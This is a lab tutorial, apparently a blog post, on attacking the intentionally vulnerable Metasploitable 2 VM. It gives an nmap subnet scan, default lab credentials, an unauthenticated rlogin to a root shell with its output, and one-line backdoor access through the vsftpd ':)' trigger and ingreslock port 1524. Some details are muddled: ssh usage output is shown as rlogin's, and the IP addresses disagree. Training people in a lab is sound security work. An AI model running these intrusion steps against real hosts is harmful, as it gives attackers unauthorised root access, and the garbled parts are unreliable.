PortscanOn a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
- Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
- Weak Passwords - These are vulnerable to bruteforce attacks.
- Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
- Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
rlogin -l root 192.168.154.132Most probably you will get something like this-
root@kali:~# rlogin -l root 192.168.154.132The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.RSA key fingerprint is *****.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '192.168.154.132' (RSA) to the list of known email@example.com's password:
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-clientThis will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.To access official Ubuntu documentation, please visit:http://help.ubuntu.com/You have mail.root@metasploitable:~#
Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.